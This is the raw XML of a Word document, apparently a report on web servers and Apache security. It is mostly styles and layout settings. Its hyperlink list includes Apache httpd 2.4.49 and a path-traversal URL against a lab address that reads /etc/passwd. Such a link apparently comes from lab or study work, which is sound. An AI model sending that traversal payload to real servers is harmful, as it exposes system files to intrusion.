    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003251C2"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009758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41A69"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle01">
    <w:name w:val="fontstyle01"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FD4243"/>
    <w:rPr>
      <w:rFonts w:ascii="Times-Bold" w:hAnsi="Times-Bold" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00F8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242408">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1257329184">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1786190719">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="160753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s://www.feistyduck.com/library/apache-security/online/apachesc-CHP-1.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viettelidc.com.vn/tin-tuc/web-server-la-gi-cach-thuc-hoat-dong-va-luu-y-khi-su-dung-web-ser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cmccloud.vn/tin-tuc/web-server-la-gi-1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10.0.2.15" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/apache/httpd/commit/48b5dfd6968cb076537b605d368d5fd889ebae86"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chive.apache.org/dist/httpd/httpd-2.4.49.tar.gz" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viettelidc.com.vn/tin-tuc/web-server-la-gi-cach-thuc-hoat-dong-va-luu-y-khi-su-dung-web-server" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.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9065-FC04-46EC-ACFF-47C0A87C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41</Pages>
  <Words>7843</Words>
  <Characters>4470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Nguyen Ngoc</cp:lastModifiedBy>
  <cp:revision>1184</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-27T04:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-05T08:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>